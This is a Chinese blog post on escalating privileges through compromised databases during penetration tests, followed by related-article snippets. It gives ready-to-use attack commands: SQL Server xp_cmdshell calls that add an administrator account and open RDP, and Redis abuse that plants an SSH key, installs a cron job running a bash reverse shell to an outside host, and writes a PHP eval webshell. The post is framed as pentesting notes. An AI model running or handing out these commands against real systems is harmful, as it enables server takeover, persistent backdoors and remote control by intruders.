渗透过程中的数据库提权思路

最新推荐文章于 2024-07-04 12:39:04 发布
最新推荐文章于 2024-07-04 12:39:04 发布
阅读量347 收藏 1
点赞数 1
分类专栏: 渗透经验 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carbbage/article/details/111411471
版权

在渗透测试中,我们可能误打误撞得到了几个粗心管理员的数据库密码,当我们一脸欣喜的连接上后,却发现库子里一清二白,或者找不到跟web项目的对应关系,那就只能从数据库层面入手,一步步夺取目标主机权限。
下面总结了一下几种常见数据库的提权思路。

mysql

作为目前使用人数最多也是最受欢迎的数据库,在大型的渗透测试中,很有可能就被扫出一两个弱密码,但时代早就变了,mysql早已已经不是那个写个webshell就直接root的傻白甜了,secure-file-priv直接将无数hacker阻于门外,虽然现在网上还有许多UDF和mof的提权方法,但后者适用范围极其严苛:

  1. windows2003server之前版本
  2. 可写入c:/windows/system32/wbem/mof权限
  3. secure-file-priv参数不为null

并且就算写入成功后也有种种可能连接不上,所以建议先写个ping脚本测一测,具体poc会放在下一篇博客。
UDF版本的也没好到哪去,还是secure-file-priv的锅,大部分数据库都没有写入插件路径的权限。
现在来看最靠谱的可能是写日志获取web shell,当然限制也很多:

  1. 目标站点搭载web应用
  2. 具有对网站根目录写入的权限

总结来说就是一句话:mysql提权,看命(5.7版本以前的除外)

sqlserver

作为同样受欢迎的老牌数据库,mssql明显友好的多,利用xp_cmdshell可以解决绝大部分数据库,具体命令如下:

#开启xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;
 
#关闭xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure

#添加用户
exec master..xp_cmdshell 'net user test test. /add' 添加用户test,密码test
exec master..xp_cmdshell 'net localgroup administrators test add' 添加test用户到管理员组
 
 #开启rdp端口
 exec master..xp_cmdshell 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'

一把梭,没什么好说的

postgresql

这也是我之前一直忽视的一个数据库,最近才发现postgres提权格外好用,基本通杀全版本,再加上它优良的弱密码传统,如果不是postgres组用户权限太低,postgresql绝对能排数据库组第一,不过渗透中利用它读读目标上的敏感数据啥的也是极好的。
同样UDF提权,失败可能性很小,就是需要注意分字节传输,具体脚本同样放在之后的博客里。

redis

上古遗留问题,现在利用可能性不是很大,很少会有root权限下开放的redis了,拿到后还是先找web的根目录最要紧。
利用方式如下:(前提是redis存在未授权访问或已知redis密码)

  1. 写入ssh公钥(需root权限)
     #将公钥写入key.txt文件中(前后用\n换行,避免和redis里其他缓存数据混合)
(echo -e "\n";cat id_rsa.pub;echo -e "\n")>key.txt

#再将key.txt文件内容写入redis库中
cat /root/.ssh/key.txt | redis-cli -h *ip* -x set pub

#设置redis的dump文件路径为/root/.ssh且文件名为authorized_keys,注意: redis 可以创建文件但无法创建目录,所以,redis 待写入文件所在的目录必须事先存在。出现如下图错误是因为目标靶机不存在.ssh目录(默认没有,需要生成公、私钥或者建立ssh连接时才会生成)
config set dir /root/.ssh
ok
config set dbfilename authorized_keys
ok
#测试免密登录
ssh -i /root/.ssh/id_isa ip
  2. 利用cron计划任务执行命令反弹shell(需root权限)
    root@kali:~# redis-cli -h 192.168.10.128
192.168.10.128:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.10.101/6666 0>&1\n"
OK
192.168.10.128:6379> config set dir /var/spool/cron/
OK
192.168.10.128:6379> config set dbfilename root
OK
192.168.10.128:6379> save
OK
  3. 写入webshell(需要知道web应用的绝对路径)
	root@kali:~# redis-cli -h 192.168.10.128
	192.168.10.128:6379> set x “<?php @eval($_GET("passer"))>”
	OK
	192.168.10.128:6379> config set dir /var/www/html/
	OK
	192.168.10.128:6379> config set dbfilename test.php
	OK
	192.168.10.128:6379> save
	OK

之后即可在网站url根目录后添加test.php连接。
总结:redis提权也是一件费力不讨好的事,利用难度较大,可结合ssrf针对性利用。

持续更新中,主要以我渗透过程中遇到的数据库为主,总结一下实战经验,memecache之类的,以后实战中遇到后会进行添加

carbbage
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
数据库】- SQL Server
weixin_41949487的博客
03-15 1152
渗透测试往往由信息收集开始,而渗透测试较为重要的环节,若始终以“低限”身份进行渗透,测试出的问题相对于高限的质量会低很多,升意味着用户获得不允许他使用的限。比如从一个普通用户,通过“手段”让自己变为管理员用户,也可以理解为利用操作系统或软件应用程序的错误,设计缺陷或配置错误来获得对更高访问限的行为。 又分为系统数据库、第三方等等,此篇文章就介绍了SQL Serve部分的方法,一起来看看吧。 知识补充 系统库 库名 含义 master .
渗透测试思路(详细!)
jklbnm12的博客
08-10 1062
J01n / 2021-07-29 23:44:22 / 浏览数 1583 安全技术 WEB安全[顶(2)](javascript:) [踩(0)](javascript:) **Webshell:**尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,数据库漏洞)来获取shell。 **反弹shell:**利用kali虚拟机msfVENOM编写反弹shell脚本 被控制端发起的shell—通常用于
渗透测试:MySQL数据库UDF详解
Bossfrank的博客
06-30 2549
本文介绍了渗透测试的常规方法——MySQL UDF。全面详解了UDF、UDF原理与过程。以vulhub靶机pWnOS2.0为例,详解了过程。读者可根据本文进行复现学习。
mysql总结(自学),面试题解析已整理成文档
2401_83946070的博客
04-18 693
检测数据库的存在(探测端口)获取到数据库限密码查看数据库的类型分类读取网站的配置文件读取数据库备份文件下的库的表的信息,例如MySQL数据库在mysql_user表存储账户密码,使用cmd5-mysql5解码暴力破解账户密码,需要支持外联(mysql默认不支持)。可以使用密码脚本在本地爆破,也可以使用工具如msf的scanner mysql_login模块MySQL数据库方式主要有三种使用sqlmap的–os-shell。
渗透测试:数据库UDF(linux)
qq_63442530的博客
04-01 1518
UDF:User Defined Function 用户自定义函数,MySQL数据库的初衷是用于方便用户进行自定义函数,方便查询一些复杂的数据,同时也有可能被攻击者利用,使用udf进行原理:攻击者通过编写,能调用cmd或者shell的共享库文件(window为.dll,linux为.so),并且导入到一个指定的文件夹目录下,在数据库通过导入的共享库文件创建自定义函数,该自定义函数功能依照于共享库文件的功能,从而在数据库调用该自定义函数能够使用系统命令。
渗透之——ASP Web
冰河的专栏
12-31 5308
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85475585 【 web 】 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当成功,3389没开的情况下,上...
MySQL之UDF
2301_76227305的博客
06-08 850
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
渗透测试指南
遇事不决冲冲冲
12-04 7383
windows系统 参考内网安全攻防:渗透测试实战指南(百度百科) 一.系统内核漏洞 利用已存在未安装补丁的漏洞进行 参考Windows系统内核溢出漏洞 1.手动寻找缺失补丁 拿到限后通过如下命令查看系统安装了哪些补丁 systeminfo wmic qfe get caption,description,hotfixid,installedon 比CMD更强大的命令行:WMIC后渗透利用(系统命令) 通过没有列出的补丁号,寻找相应的EXP进行(挺离谱的感觉) 系统漏洞与对应的
渗透测试—方式总结
qq_29864185的博客
07-06 1795
目录 一、 什么是 二、怎样进行的方式有哪些) 1、系统漏洞 (1)Windows (2)Linux系统 2、数据库 (1)MySQL数据库 3、系统配置不当 4、限继承类 5、第三方软件/服务6、WebServer漏洞 一、 什么是 就是通过各种办法和漏洞,高自己在服务器限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进
升之——数据库
温柔小薛的博客
05-06 2739
数据库升 这是这两天学习的哈,一篇篇发太麻烦了,就整理在一篇文章里了,整体感觉基本都是靠工具,不靠工具的还是都比较有难度的,五一假期过去了也该继续回到紧张的学习了,冲鸭! 在家没衣服穿太可怜了,想回学校取衣服T_T 如何获取mysql账号密码 1.查看网站配置文件。 如:conn、config、data、sql、common 、inc等。 2.查看数据库安装路径下的mysql文件 安装目...
部分渗透文章
04-16
在Linux渗透,攻击者可能会寻找命令注入、未授的远程访问、SUID/SGID程序漏洞等。熟练使用Linux命令行工具,理解文件限和进程管理,是成功渗透的关键。 3. **XSS攻击**:XSS是一种客户端安全漏洞,攻击者通过...
渗透测试
07-18
本文档描述了渗透的基本套路
WEB渗透测试数据库.zip
06-28
渗透测试
Nmap与渗透测试数据库
12-14
Nmap能够很好地与Metasploit渗透测试数据库集成在一起,可以方便地在Metasploit终端使用db_nmap,如:  msf > db_nmap -Pn -sV 10.10.10.0/24  该命令是Nmap的一个封装,与Nmap使用方法完全一致,不同的是其...
辅臣数据库查看.rar
06-22
标题“辅臣数据库查看.rar”和描述“网络安全-渗透-查看数据库工具”示我们,这个压缩包可能包含一个用于网络安全分析,特别是在渗透测试过程用于查看数据库的工具。在这个场景下,渗透测试是合法的安全评估...
亚信安全发布2024年6月威胁态势,高危漏洞猛增60%
亚信安全官方账号的博客
07-04 348
亚信安全发布2024年6月威胁态势
[图解]SysML和EA建模住宅安全系统-09-流程指南·分析系统需求
rolt的专栏
07-04 933
然后这一步,你看,这里有个决策点
构建安全稳定的应用:SpringSecurity实用指南
最新发布
zhugedali_的博客
07-04 720
它涵盖了认证(Authentication)、授(Authorization)、防止常见的安全攻击等多个方面,适用于各种类型的应用,包括 Web 应用、RESTful 服务、微服务等。- 生成认证对象:认证成功后,创建包含用户信息、角色和限的 Authentication 对象,并存储在安全上下文。- 加载用户角色和限:除了基本的用户信息,还包括用户所拥有的角色和限。- 认证请求处理:根据配置的认证方式,对用户交的认证信息进行验证。
内网渗透测试:MySql的利用与思路总结1
08-03
在针对网站渗透,很多都是跟MySQL数据库有关,各种MySQL注入、利用MySQL来获取webshell、MySQL等等。对于渗透测试人员来说,充分了解MySQL的利用与思路对于成功渗透目标系统至关重要。 在进行内网渗透...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值